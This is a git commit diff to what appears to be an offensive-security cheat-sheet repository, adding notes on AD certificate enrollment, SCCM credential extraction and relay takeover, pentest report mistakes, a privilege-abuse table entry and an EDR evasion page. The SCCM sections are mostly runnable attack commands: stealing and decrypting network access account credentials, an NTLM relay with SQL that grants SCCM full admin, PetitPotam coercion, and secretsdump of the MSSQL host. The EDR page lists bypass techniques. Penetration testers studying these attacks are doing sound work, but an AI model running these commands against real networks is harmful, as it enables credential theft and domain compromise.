SCCM Relay + Common Mistakes Report + EDR
parent
efa8e4a5f9
commit
83df26c452
|
@ -10,6 +10,18 @@ Active Directory Certificate Services (AD CS) is a Microsoft Windows server role
|
|||
* certutil: `certutil.exe -config - -ping`, `certutil -dump`
|
||||
|
||||
|
||||
## Certificate Enrollment
|
||||
|
||||
* DNS required (`CT_FLAG_SUBJECT_ALT_REQUIRE_DNS` or `CT_FLAG_SUBJECT_ALT_REQUIRE_DOMAIN_DNS`): only principals with their `dNSHostName` attribute set can enroll.
|
||||
* Active Directory Users cannot enroll in certificate templates requiring `dNSHostName`.
|
||||
* Computers will get their `dNSHostName` attribute set when you **domain-join** a computer, but the attribute is null if you simply create a computer object in AD.
|
||||
* Computers have validated write to their `dNSHostName` attribute meaning they can add a DNS name matching their computer name.
|
||||
|
||||
* Email required (`CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL` or `CT_FLAG_SUBJECT_REQUIRE_EMAIL`): only principals with their `mail` attribute set can enroll unless the template is of schema version 1.
|
||||
* By default, users and computers do not have their `mail` attribute set, and they cannot modify this attribute themselves.
|
||||
* Users might have the `mail` attribute set, but it is rare for computers.
|
||||
|
||||
|
||||
## ESC1 - Misconfigured Certificate Templates
|
||||
|
||||
> Domain Users can enroll in the **VulnTemplate** template, which can be used for client authentication and has **ENROLLEE_SUPPLIES_SUBJECT** set. This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA). Allows additional identities to be bound to a certificate beyond the Subject.
|
||||
|
@ -510,3 +522,4 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi
|
|||
* [ADCS ESC13 Abuse Technique - Jonas Bülow Knudsen - 02/15/2024](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53)
|
||||
* [From DA to EA with ESC5 - Andy Robbins - May 16, 2023](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c)
|
||||
* [ADCS ESC14 Abuse Technique - Jonas Bülow Knudsen - 02/01/2024](https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9)
|
||||
* [ADCS Attack Paths in BloodHound — Part 2 - Jonas Bülow Knudsen - May 1, 2024](https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-2-ac7f925d1547)
|
|
@ -120,11 +120,20 @@
|
|||
|
||||
Create a machine or compromise an existing one, then request policies such as `NAAConfig`
|
||||
|
||||
Easy mode using `SharpSCCM`
|
||||
|
||||
```ps1
|
||||
SharpSCCM get secrets -u <username-machine-$> -p <password>
|
||||
SharpSCCM get naa
|
||||
```
|
||||
|
||||
Stealthy mode by creating a computer.
|
||||
|
||||
* Create a machine account with a specific password: `addcomputer.py -computer-name 'customsccm$' -computer-pass 'YourStrongPassword123*' 'sccm.lab/carol:SCCMftw' -dc-ip 192.168.33.10`
|
||||
* In your `/etc/hosts` file, add an entry for the MECM server: `192.168.33.11 MECM MECM.SCCM.LAB`
|
||||
* Use `sccmwtf` to request a policy: `python3 sccmwtf.py fake fakepc.sccm.lab MECM 'SCCMLAB\customsccm$' 'YourStrongPassword123*'`
|
||||
* Parse the policy to extract the credentials and decrypt them using [sccmwtf/policysecretunobfuscate.py](https://github.com/xpn/sccmwtf/blob/main/policysecretunobfuscate.py): `cat /tmp/naapolicy.xml |grep 'NetworkAccessUsername\|NetworkAccessPassword' -A 5 |grep -e 'CDATA' | cut -d '[' -f 3|cut -d ']' -f 1| xargs -I {} python3 policysecretunobfuscate.py {}`
|
||||
|
||||
|
||||
### CRED-3 Extract currently deployed credentials stored as DPAPI blobs
|
||||
|
||||
|
@ -224,6 +233,38 @@ From a remote machine.
|
|||
```
|
||||
|
||||
|
||||
## SCCM Relay
|
||||
|
||||
### TAKEOVER1 - Low Privileges to Database Administrator - MSSQL relay
|
||||
|
||||
**Requirements**:
|
||||
|
||||
- Database separated from the site server
|
||||
- Server site is sysadmin of the database
|
||||
|
||||
**Exploitation**:
|
||||
|
||||
* Generate the query to elevate our user: `python3 sccmhunter.py mssql -u carol -p SCCMftw -d sccm.lab -dc-ip 192.168.33.10 -debug -tu carol -sc P01 -stacked`
|
||||
* Setup a relay with the generated query: `ntlmrelayx.py -smb2support -ts -t mssql://192.168.33.12 -q "USE CM_P01; INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (0x01050000000000051500000058ED3FD3BF25B04EDE28E7B85A040000,'SCCMLAB\carol',0,0,'','','','','P01');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00ALL','29');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00001','1'); INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00004','1');"`
|
||||
* Coerce an authentication to your listener using a domain account: `petitpotam.py -d sccm.lab -u carol -p SCCMftw 192.168.33.1 192.168.33.11`
|
||||
* Finally, connect as admin on the MSSQL server: `python3 sccmhunter.py admin -u carol@sccm.lab -p 'SCCMftw' -ip 192.168.33.11 `
|
||||
|
||||
|
||||
### TAKEOVER2 - Low Privileges to MECM Admin Account - SMB relay
|
||||
|
||||
Microsoft requires the site server's computer account to be an administrator on the MSSQL server.
|
||||
|
||||
**Exploitation**:
|
||||
|
||||
* Start a listener for the MSSQL Server: `ntlmrelayx -t 192.168.33.12 -smb2support -socks`
|
||||
* Coerce an authentication from the Site Server using domain credentials (low privileges SCCM NAA retrieved on the same machine works great): `petitpotam.py -d sccm.lab -u sccm-naa -p 123456789 192.168.33.1 192.168.33.11`
|
||||
* Finally use the SOCKS from `ntlmrelayx` to access the MSSQL server as a local administrator
|
||||
```ps1
|
||||
proxychains -q smbexec.py -no-pass SCCMLAB/'MECM$'@192.168.33.12
|
||||
proxychains -q secretsdump.py -no-pass SCCMLAB/'MECM$'@192.168.33.12
|
||||
```
|
||||
|
||||
|
||||
## SCCM Persistence
|
||||
|
||||
* [mandiant/CcmPwn](https://github.com/mandiant/CcmPwn) - lateral movement script that leverages the CcmExec service to remotely hijack user sessions.
|
||||
|
|
|
@ -51,3 +51,4 @@ Get-AzACR -username ${username} -password ${password} -registry ${registryURI}
|
|||
## References
|
||||
|
||||
* [PENTESTING AZURE: RECON TECHNIQUES - April 29, 2022 Stefan Tita](https://securitycafe.ro/2022/04/29/pentesting-azure-recon-techniques/)
|
||||
* [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
|
|
@ -1,12 +1,6 @@
|
|||
# Vulnerability Reports
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Vulnerability Report Structure](#vulnerability-report-structure)
|
||||
* [Vulnerability Details Structure](#vulnerability-details-structure)
|
||||
* [General Guidelines](#general-guidelines)
|
||||
* [References](#references)
|
||||
> A pentest vulnerability report documents the findings of a penetration test, detailing identified security weaknesses, their potential impact, and remediation steps. It is critical for informing stakeholders about the security posture of their systems, prioritizing vulnerabilities, and guiding mitigation efforts. Effective reports enhance overall security by providing actionable insights to prevent exploitation.
|
||||
|
||||
|
||||
## Tools
|
||||
|
@ -43,8 +37,34 @@ List of penetration test reports and templates.
|
|||
## General Guidelines
|
||||
|
||||
* Use a **Passive Voice Form**.
|
||||
* **Obfuscate** the secrets: passwords, token, ...
|
||||
* Add **caption** to all figures and pictures.
|
||||
* **Obfuscate** the secrets and Personal Identifiable Information: `passwords`, `token`, Identity cards, Pictures ...
|
||||
* Include **captions** for all figures and images.
|
||||
* Apply **shadows** to images to enhance their visual appeal.
|
||||
* Customize the report for technical and non-technical stakeholders, ensuring clarity and comprehensibility for all readers.
|
||||
* Explain the **business impact** and context of vulnerabilities to help prioritize remediation efforts effectively.
|
||||
* Include **positive security practices** and areas of improvement to provide a balanced view.
|
||||
|
||||
|
||||
## Common Mistakes
|
||||
|
||||
* Most of the time you don't `blur` enough the picture, it is always better to add a dark/red square on top of the data you want to obfuscate.
|
||||
|
||||
* **Edit the pictures** before importing them in the document:
|
||||
* A cropped picture can be `uncropped` inside the Word document
|
||||
* Word drawings added on top of the image can be removed, and the image is still present unobfuscated inside the Word archive
|
||||
|
||||
* Always **distribute a PDF** file to your customer, not a Word, LaTeX or Markdown file
|
||||
* Word is an archive file, you can rename it as .zip to explore the content
|
||||
* For sensitive files, you might want to **add a password** on the file
|
||||
|
||||
* Sending data on a uncontrolled LLM
|
||||
* Using a **LOCAL** Large Language Model to help you is fine. For example, you can use `ollama` + `openwebui` + `llama3` model on an on-premise machine disconnected from Internet
|
||||
* Never send customer data or sensitive information on ChatGPT, Mistral AI, Gemini, etc, you don't know how the data will be processed and stored.
|
||||
|
||||
* Neglecting **Proof of Concepts** (PoCs)
|
||||
* Failing to include PoCs or detailed reproduction steps can hinder the remediation process.
|
||||
* If the PoC is small, like a `curl` command, add it inside the Reproductions Steps. Otherwise add it to the Appendix and reference it inside the Reproductions Steps.
|
||||
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -1124,6 +1124,8 @@ Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary bel
|
|||
|`SeRestore`| ***Admin*** | **PowerShell** | 1. Launch PowerShell/ISE with the SeRestore privilege present.<br>2. Enable the privilege with [Enable-SeRestorePrivilege](https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1)).<br>3. Rename utilman.exe to utilman.old<br>4. Rename cmd.exe to utilman.exe<br>5. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
|
||||
|`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`<br>2. `icalcs.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
|
||||
|`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.<br> <br>To be verified. ||
|
||||
|`SeRelabel`| ***Admin*** | 3rd party too | [decoder-it/RelabelAbuse](https://github.com/decoder-it/RelabelAbuse) | Allows you to own resources that have an integrity level even higher than your own |
|
||||
|
||||
|
||||
### Restore A Service Account's Privileges
|
||||
|
||||
|
@ -1534,3 +1536,4 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
|
|||
* [Escalating Privileges via Third-Party Windows Installers - ANDREW OLIVEAU - JUL 19, 2023](https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers)
|
||||
* [Deleting Your Way Into SYSTEM: Why Arbitrary File Deletion Vulnerabilities Matter - ANDREW OLIVEAU - SEP 11, 2023](https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities)
|
||||
* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - Simon Zuckerbraun - March 17, 2022 ](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks)
|
||||
* [Abusing the SeRelabelPrivilege - @decoder_it - May 30, 2024](https://decoder.cloud/2024/05/30/abusing-the-serelabelprivilege/)
|
|
@ -0,0 +1,72 @@
|
|||
# Endpoint Detection and Response
|
||||
|
||||
Endpoint Detection and Response (EDR) is a security solution that combines real-time monitoring, data collection, and advanced analytics to detect, investigate, and respond to cyber threats at the endpoint level. Leveraging machine learning algorithms and behavioral analysis, EDR tools can identify malicious activities, automate containment and remediation actions, and provide forensic insights to enhance an organization's overall security posture.
|
||||
|
||||
|
||||
## Static Detection
|
||||
|
||||
**Mechanism**: Static detection is a security technique used in EDR and antivirus software that analyzes files and applications without executing them, typically based on predefined signatures or known malicious patterns.
|
||||
|
||||
**Bypass**:
|
||||
|
||||
- Obfuscate strings
|
||||
- Dynamically resolving strings
|
||||
- Dynamically resolving imports, reducing the `Import Address Table` (IAT)
|
||||
- Custom `GetProcAddress` and `GetModuleHandle`
|
||||
- API Hashing
|
||||
|
||||
|
||||
## User Behavioural Analysis
|
||||
|
||||
**Mechanism**: User Behavioral Analysis (UBA) monitors and analyzes user activities and patterns to detect anomalies and potential threats.
|
||||
|
||||
**Bypass**:
|
||||
|
||||
- Learning about OPSEC methods
|
||||
|
||||
|
||||
## Usermode Windows Function Monitoring
|
||||
|
||||
**Mechanism**: Usermode Windows Function Monitoring is a technique that tracks and analyzes the execution of Windows API (Application Programming Interface) calls and functions within user space processes.
|
||||
|
||||
**Bypass**:
|
||||
|
||||
- Unhooking
|
||||
- Indirect syscalls
|
||||
|
||||
|
||||
## Call Stack Analysis
|
||||
|
||||
**Mechanism**: Checking the origin of function calls via the Call Stack chain
|
||||
|
||||
**Bypass**:
|
||||
|
||||
- TODO
|
||||
- TODO
|
||||
|
||||
|
||||
## Process Analysis
|
||||
|
||||
**Mechanism**: Process analysis includes inspecting memory regions, identifying remote process access, and assessing child processes to gain insights into process relationships, uncover hidden or suspicious activities.
|
||||
|
||||
**Bypass**:
|
||||
|
||||
- Avoid RWX memory region (RW->RX)
|
||||
- Break parent-child link (e.g: word.exe spawning cmd.exe)
|
||||
- TODO
|
||||
|
||||
|
||||
## Kernel Callbacks
|
||||
|
||||
**Mechanism**: Kernel callbacks in the context of Endpoint Detection and Response (EDR) are functions registered by kernel drivers that get triggered in response to specific events or actions within the operating system's kernel.
|
||||
|
||||
**Bypass**:
|
||||
|
||||
- TODO
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Flying Under the Radar: Part 1: Resolving Sensitive Windows Functions with x64 Assembly - theepicpowner - Apr 24, 2024](https://theepicpowner.gitlab.io/posts/Flying-Under-the-Radar-Part-1/)
|
||||
* [Malware AV/VM evasion - part 16: WinAPI GetProcAddress implementation. Simple C++ example - cocomelonc](https://cocomelonc.github.io/malware/2023/04/16/malware-av-evasion-16.html)
|
||||
* [Custom GetProcAddress And GetModuleHandle Implementation (X64) - daax - December 15, 2016](https://revers.engineering/custom-getprocaddress-and-getmodulehandle-implementation-x64/)
|
Loading…
Reference in New Issue